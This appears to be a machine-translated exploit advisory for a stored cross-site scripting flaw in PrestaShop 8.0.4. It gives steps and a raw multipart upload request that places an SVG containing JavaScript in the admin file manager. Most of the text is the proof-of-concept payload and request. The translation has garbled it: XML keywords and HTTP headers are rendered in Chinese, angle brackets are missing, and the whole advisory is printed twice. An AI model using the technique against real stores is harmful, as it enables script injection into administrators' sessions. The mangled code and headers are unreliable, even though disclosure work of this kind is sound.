利用标题: PRESTASHOP 8.0.4-跨站点脚本(XSS)
Application: Prestashop
版本: 8.0.4
BUGS:存储的XSS
Technology: php
供应商URL: https://prestashop.com/
软件link: https://prestashop.com/prestashop-edition-basic/
发现日期: 30.06.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。转到目录=产品
2。选择arbitary产品
2。上传恶意SVG文件
SVG文件内容===
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
POC请求:
post/admin253irhit4jjbd9gurze/filemanager/upload.php http/1.1
HOST: LOCALHOST
内容长度: 756
SEC-CH-UA:
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
content-type:多部分/form-data;边界=--- WebKitformBoundaryzp0ewySQ0YSV2SCZ
ACCEPT:应用程序/JSON
CACHE-CONTROL:无缓存
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/admin253irhit4jjbd...cending=1descending=falsesort_by=lang=lang=en
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=JCSQ33E9KK7SK7SK5M3BSSJVHHGGT; Prestashop-C1C78947C88162EB206771DF4A41C662=DEF502004DD8C2A13335B9BE53C804392B0A2C75C75CFFFF9BDB5C1 9CD61A5607C418B0F035C998ECF5B54C45E92F99C4E4E01CFAB3D0AF19E89F664379D034EEEF94EEEF9F9FB2B26CDA14713D019A4 C3BE8322C0F43BE6EEE245F9AB58A590058989B65701B1894D2A6857C3A6F542B71501EA0D8695E3695E3642EC9A317C99 BE7A752CBF54A31AF3EB042F935DBFB7586D53E0C1CC72D965C806E66B150A3F5CA5CA5CA5CA5CA5CA5CA5CA5CA512A5577777AB2D4038A0FC52 1F9C4092B5F7BCD031FB09250D825BFA0D3B68E8F0329BF725BCD2565AA0997C4F352D0F156CD0F156CD3B53B5FA922DE6A777F4 6EB1DAE7DBAC79B172597D56D3F842B91D25354E597C14C618FFB5FB5EFA795611FFB3E04CEDBEBBB33333D6D6D8CC0DA28AC1A4 32A8A310C18A1A449568A7A66C7444379E23BE16563E8FF26B5CD8694C1E7FE43344710A555555567777527C7527C7C7590348E6DAF7 D438827B3AD748E99AFE6842A508B14DC754FECFC5D0706869B34A9DD7630B12694C5ED865CCACACACB9B9B9B9B9B9B9B05D58D6D92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a 8D1A976E10BB88D799F690ED85266F0515212C75D60115E5998F3BD6D6D69DF403 8125DBE6A3DF081EA53A363959D276AAA046F958AD7F100B252E6305AB0A36808E F58868AB8BF11E941729ECA845709D4578DEAC87D18771AEB7B7B7B7B7B93DC1652344A 89b5222394C68DC5F72F137D41708ADE1916630E768B005EA48BB063DB2DE8A 4E93BB8142C5206C73A72C33BCACE8BCC7A0F9BA713590261F8DDEE4692955 709B631566C1097ACF676A1DAA41E44B497834DA8685E2156B0FE90FE90ABD0C0B47 D24DB358A7440C1469394AC302C800A0136B463ABA2957206F8B09A43D9D1FC 5F524A4E7D7A6CA7D09D60C9A1EE155262E02267267260ABEC3CA148D5A20D1D4A 3a50c8d4abcaefe11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fd CDE5A9631148B7B9356BC490477774D705E0986081C7609C64F0F11C0F11C0F5F5F2B8D10 A578DB400373C02E333252EC319D517B92F01479A39B2BDE7826B488E1BA64613 c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
连接:关闭
------ webkitformboundaryzp0ewysq0ysv2scz
content-disposition: form-data;名称='路径'
------ webkitformboundaryzp0ewysq0ysv2scz
content-disposition: form-data;名称='path_thumb'
------ webkitformboundaryzp0ewysq0ysv2scz
content-disposition: form-data;名称='文件';文件名='malas.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
------ webkitformboundaryzp0ewysq0ysv2scz--
Application: Prestashop
版本: 8.0.4
BUGS:存储的XSS
Technology: php
供应商URL: https://prestashop.com/
软件link: https://prestashop.com/prestashop-edition-basic/
发现日期: 30.06.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。转到目录=产品
2。选择arbitary产品
2。上传恶意SVG文件
SVG文件内容===
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
POC请求:
post/admin253irhit4jjbd9gurze/filemanager/upload.php http/1.1
HOST: LOCALHOST
内容长度: 756
SEC-CH-UA:
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
content-type:多部分/form-data;边界=--- WebKitformBoundaryzp0ewySQ0YSV2SCZ
ACCEPT:应用程序/JSON
CACHE-CONTROL:无缓存
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/admin253irhit4jjbd...cending=1descending=falsesort_by=lang=lang=en
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=JCSQ33E9KK7SK7SK5M3BSSJVHHGGT; Prestashop-C1C78947C88162EB206771DF4A41C662=DEF502004DD8C2A13335B9BE53C804392B0A2C75C75CFFFF9BDB5C1 9CD61A5607C418B0F035C998ECF5B54C45E92F99C4E4E01CFAB3D0AF19E89F664379D034EEEF94EEEF9F9FB2B26CDA14713D019A4 C3BE8322C0F43BE6EEE245F9AB58A590058989B65701B1894D2A6857C3A6F542B71501EA0D8695E3695E3642EC9A317C99 BE7A752CBF54A31AF3EB042F935DBFB7586D53E0C1CC72D965C806E66B150A3F5CA5CA5CA5CA5CA5CA5CA5CA5CA512A5577777AB2D4038A0FC52 1F9C4092B5F7BCD031FB09250D825BFA0D3B68E8F0329BF725BCD2565AA0997C4F352D0F156CD0F156CD3B53B5FA922DE6A777F4 6EB1DAE7DBAC79B172597D56D3F842B91D25354E597C14C618FFB5FB5EFA795611FFB3E04CEDBEBBB33333D6D6D8CC0DA28AC1A4 32A8A310C18A1A449568A7A66C7444379E23BE16563E8FF26B5CD8694C1E7FE43344710A555555567777527C7527C7C7590348E6DAF7 D438827B3AD748E99AFE6842A508B14DC754FECFC5D0706869B34A9DD7630B12694C5ED865CCACACACB9B9B9B9B9B9B9B05D58D6D92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a 8D1A976E10BB88D799F690ED85266F0515212C75D60115E5998F3BD6D6D69DF403 8125DBE6A3DF081EA53A363959D276AAA046F958AD7F100B252E6305AB0A36808E F58868AB8BF11E941729ECA845709D4578DEAC87D18771AEB7B7B7B7B7B93DC1652344A 89b5222394C68DC5F72F137D41708ADE1916630E768B005EA48BB063DB2DE8A 4E93BB8142C5206C73A72C33BCACE8BCC7A0F9BA713590261F8DDEE4692955 709B631566C1097ACF676A1DAA41E44B497834DA8685E2156B0FE90FE90ABD0C0B47 D24DB358A7440C1469394AC302C800A0136B463ABA2957206F8B09A43D9D1FC 5F524A4E7D7A6CA7D09D60C9A1EE155262E02267267260ABEC3CA148D5A20D1D4A 3a50c8d4abcaefe11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fd CDE5A9631148B7B9356BC490477774D705E0986081C7609C64F0F11C0F11C0F5F5F2B8D10 A578DB400373C02E333252EC319D517B92F01479A39B2BDE7826B488E1BA64613 c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
连接:关闭
------ webkitformboundaryzp0ewysq0ysv2scz
content-disposition: form-data;名称='路径'
------ webkitformboundaryzp0ewysq0ysv2scz
content-disposition: form-data;名称='path_thumb'
------ webkitformboundaryzp0ewysq0ysv2scz
content-disposition: form-data;名称='文件';文件名='malas.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
------ webkitformboundaryzp0ewysq0ysv2scz--
